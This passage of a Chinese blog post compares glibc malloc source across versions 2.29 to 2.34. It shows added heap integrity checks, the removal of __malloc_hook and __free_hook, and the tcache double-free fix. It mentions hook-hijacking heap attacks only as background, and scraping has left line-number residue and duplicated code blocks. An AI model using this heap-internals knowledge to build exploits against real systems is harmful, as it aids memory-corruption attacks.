    21
    22
    23
    24
    25
    26
    27
    28
    29
    void *
    __libc_malloc (size_t bytes)
    {
    mstate ar_ptr;
    void *victim;

    void *(*hook) (size_t, const void *)
    = atomic_forced_read (__malloc_hook);
    if (__builtin_expect (hook != NULL, 0))
    return (*hook)(bytes, RETURN_ADDRESS (0));
    #if USE_TCACHE
    /* int_free also calls request2size, be careful to not pad twice. */
    size_t tbytes;
    checked_request2size (bytes, tbytes);
    size_t tc_idx = csize2tidx (tbytes);

    MAYBE_INIT_TCACHE ();

    DIAG_PUSH_NEEDS_COMMENT;
    if (tc_idx < mp_.tcache_bins
    /*&& tc_idx < TCACHE_MAX_BINS*/ /* to appease gcc */
    && tcache
    && tcache->entries[tc_idx] != NULL) //改动在此处
    {
    return tcache_get (tc_idx);
    }
    DIAG_POP_NEEDS_COMMENT;
    #endif
    /* 有删节 */
  • _int_malloc 加入 checks
    New

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    123
    124
    125
    126
    127
    128
    129
    130
    131
    132
    133
    134
    135
    136
    137
    138
    139
    140
    141
    142
    143
    144
    145
    146
    147
    148
    149
    150
    151
    152
    153
    154
    155
    156
    157
    158
    159
    160
    161
    162
    163
    164
    165
    166
    167
    168
    169
    170
    171
    172
    173
    174
          while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))
    {
    bck = victim->bk;
    size = chunksize (victim);
    mchunkptr next = chunk_at_offset (victim, size);//此处有改动

    if (__glibc_unlikely (size <= 2 * SIZE_SZ)//此处有改动
    || __glibc_unlikely (size > av->system_mem))
    malloc_printerr ("malloc(): invalid size (unsorted)");
    if (__glibc_unlikely (chunksize_nomask (next) < 2 * SIZE_SZ)
    || __glibc_unlikely (chunksize_nomask (next) > av->system_mem))
    malloc_printerr ("malloc(): invalid next size (unsorted)");
    if (__glibc_unlikely ((prev_size (next) & ~(SIZE_BITS)) != size))
    malloc_printerr ("malloc(): mismatching next->prev_size (unsorted)");
    if (__glibc_unlikely (bck->fd != victim)
    || __glibc_unlikely (victim->fd != unsorted_chunks (av)))
    malloc_printerr ("malloc(): unsorted double linked list corrupted");
    if (__glibc_unlikely (prev_inuse (next)))
    malloc_printerr ("malloc(): invalid next->prev_inuse (unsorted)");

    /*
    If a small request, try to use last remainder if it is the
    only chunk in unsorted bin. This helps promote locality for
    runs of consecutive small requests. This is the only
    exception to best-fit, and applies only when there is
    no exact fit for a small chunk.
    */

    if (in_smallbin_range (nb) &&
    bck == unsorted_chunks (av) &&
    victim == av->last_remainder &&
    (unsigned long) (size) > (unsigned long) (nb + MINSIZE))
    {
    /* split and reattach remainder */
    remainder_size = size - nb;
    remainder = chunk_at_offset (victim, nb);
    unsorted_chunks (av)->bk = unsorted_chunks (av)->fd = remainder;
    av->last_remainder = remainder;
    remainder->bk = remainder->fd = unsorted_chunks (av);
    if (!in_smallbin_range (remainder_size))
    {
    remainder->fd_nextsize = NULL;
    remainder->bk_nextsize = NULL;
    }

    set_head (victim, nb | PREV_INUSE |
    (av != &main_arena ? NON_MAIN_ARENA : 0));
    set_head (remainder, remainder_size | PREV_INUSE);
    set_foot (remainder, remainder_size);

    check_malloced_chunk (av, victim, nb);
    void *p = chunk2mem (victim);
    alloc_perturb (p, bytes);
    return p;
    }

    /* remove from unsorted list */
    if (__glibc_unlikely (bck->fd != victim))//此处有改动
    malloc_printerr ("malloc(): corrupted unsorted chunks 3");
    unsorted_chunks (av)->bk = bck;
    bck->fd = unsorted_chunks (av);

    /* Take now instead of binning if exact fit */

    if (size == nb)
    {
    set_inuse_bit_at_offset (victim, size);
    if (av != &main_arena)
    set_non_main_arena (victim);
    #if USE_TCACHE
    /* Fill cache first, return to user only if cache fills.
    We may return one of these chunks later. */
    if (tcache_nb
    && tcache->counts[tc_idx] < mp_.tcache_count)
    {
    tcache_put (victim, tc_idx);
    return_cached = 1;
    continue;
    }
    else
    {
    #endif
    check_malloced_chunk (av, victim, nb);
    void *p = chunk2mem (victim);
    alloc_perturb (p, bytes);
    return p;
    #if USE_TCACHE
    }
    #endif
    }
    /* place chunk in bin */

    if (in_smallbin_range (size))
    {
    victim_index = smallbin_index (size);
    bck = bin_at (av, victim_index);
    fwd = bck->fd;
    }
    else
    {
    victim_index = largebin_index (size);
    bck = bin_at (av, victim_index);
    fwd = bck->fd;

    /* maintain large bins in sorted order */
    if (fwd != bck)
    {
    /* Or with inuse bit to speed comparisons */
    size |= PREV_INUSE;
    /* if smaller than smallest, bypass loop below */
    assert (chunk_main_arena (bck->bk));
    if ((unsigned long) (size)
    < (unsigned long) chunksize_nomask (bck->bk))
    {
    fwd = bck;
    bck = bck->bk;

    victim->fd_nextsize = fwd->fd;
    victim->bk_nextsize = fwd->fd->bk_nextsize;
    fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;
    }
    else
    {
    assert (chunk_main_arena (fwd));
    while ((unsigned long) size < chunksize_nomask (fwd))
    {
    fwd = fwd->fd_nextsize;
    assert (chunk_main_arena (fwd));
    }

    if ((unsigned long) size
    == (unsigned long) chunksize_nomask (fwd))
    /* Always insert in the second position. */
    fwd = fwd->fd;
    else
    {
    victim->fd_nextsize = fwd;
    victim->bk_nextsize = fwd->bk_nextsize;
    if (__glibc_unlikely (fwd->bk_nextsize->fd_nextsize != fwd))
    malloc_printerr ("malloc(): largebin double linked list corrupted (nextsize)");
    fwd->bk_nextsize = victim;
    victim->bk_nextsize->fd_nextsize = victim;
    }
    bck = fwd->bk;
    if (bck->fd != fwd)
    malloc_printerr ("malloc(): largebin double linked list corrupted (bk)");
    }
    }
    else
    victim->fd_nextsize = victim->bk_nextsize = victim;
    }

    mark_bin (av, victim_index);
    victim->bk = bck;
    victim->fd = fwd;
    fwd->bk = victim;
    bck->fd = victim;

    #if USE_TCACHE
    /* If we've processed as many chunks as we're allowed while
    filling the cache, return one of the cached ones. */
    ++tcache_unsorted_count;
    if (return_cached
    && mp_.tcache_unsorted_limit > 0
    && tcache_unsorted_count > mp_.tcache_unsorted_limit)
    {
    return tcache_get (tc_idx);
    }
    #endif

    #define MAX_ITERS 10000
    if (++iters >= MAX_ITERS)
    break;
    }

2.29

2.30

2.31

2.32

2.34

Old:

1
2
3
4
void *(*hook) (size_t, const void *)
= atomic_forced_read (__malloc_hook);
if (__builtin_expect (hook != NULL, 0))
return (*hook)(bytes, RETURN_ADDRESS (0));

New:
1
2
if (!__malloc_initialized)
ptmalloc_init ();

在 2.34 中 __malloc_hook 不复存在,于此相关联的劫持 __malloc_hook 的攻击手段也随之无效.
事实上,不只是 __malloc_hook,还有 __free_hook__realloc_hook 也不复存在. __free_hook 被直接删去.
Old:

1
2
3
4
5
6
7
void (*hook) (void *, const void *)
= atomic_forced_read (__free_hook);
if (__builtin_expect (hook != NULL, 0))
{
(*hook)(mem, RETURN_ADDRESS (0));
return;
}

New:
1

tcache 的 double free 检测完成了修复
Old:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
if (__glibc_unlikely (e->key == tcache))
{
tcache_entry *tmp;
size_t cnt = 0;
LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);
for (tmp = tcache->entries[tc_idx];
tmp;
tmp = REVEAL_PTR (tmp->next), ++cnt)
{
if (cnt >= mp_.tcache_count)
malloc_printerr ("free(): too many chunks detected in tcache");
if (__glibc_unlikely (!aligned_OK (tmp)))
malloc_printerr ("free(): unaligned chunk detected in tcache 2");
if (tmp == e)
malloc_printerr ("free(): double free detected in tcache 2");
/* If we get here, it was a coincidence. We've wasted a
few cycles, but don't abort. */
}
}

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
if (__glibc_unlikely (e->key == tcache))
{
tcache_entry *tmp;
size_t cnt = 0;
LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);
for (tmp = tcache->entries[tc_idx];
tmp;
tmp = REVEAL_PTR (tmp->next), ++cnt)
{
if (cnt >= mp_.tcache_count)
malloc_printerr ("free(): too many chunks detected in tcache");
if (__glibc_unlikely (!aligned_OK (tmp)))
malloc_printerr ("free(): unaligned chunk detected in tcache 2");
if (tmp == e)
malloc_printerr ("free(): double free detected in tcache 2");
/* If we get here, it was a coincidence. We've wasted a
few cycles, but don't abort. */
}
}

New:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
if (__glibc_unlikely (e->key == tcache_key))
{
tcache_entry *tmp;
size_t cnt = 0;
LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);
for (tmp = tcache->entries[tc_idx];
tmp;
tmp = REVEAL_PTR (tmp->next), ++cnt)
{
if (cnt >= mp_.tcache_count)
malloc_printerr ("free(): too many chunks detected in tcache");
if (__glibc_unlikely (!aligned_OK (tmp)))
malloc_printerr ("free(): unaligned chunk detected in tcache 2");
if (tmp == e)
malloc_printerr ("free(): double free detected in tcache 2");
/* If we get here, it was a coincidence. We've wasted a
few cycles, but don't abort. */
}
}

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
if (__glibc_unlikely (e->key == tcache_key))
{
tcache_entry *tmp;
size_t cnt = 0;
LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);
for (tmp = tcache->entries[tc_idx];
tmp;
tmp = REVEAL_PTR (tmp->next), ++cnt)
{
if (cnt >= mp_.tcache_count)
malloc_printerr ("free(): too many chunks detected in tcache");
if (__glibc_unlikely (!aligned_OK (tmp)))
malloc_printerr ("free(): unaligned chunk detected in tcache 2");
if (tmp == e)
malloc_printerr ("free(): double free detected in tcache 2");
/* If we get here, it was a coincidence. We've wasted a
few cycles, but don't abort. */
}
}

未完待续

参考资料

1. 俞甲子.程序员的自我修养[M].北京:电子工业出版社.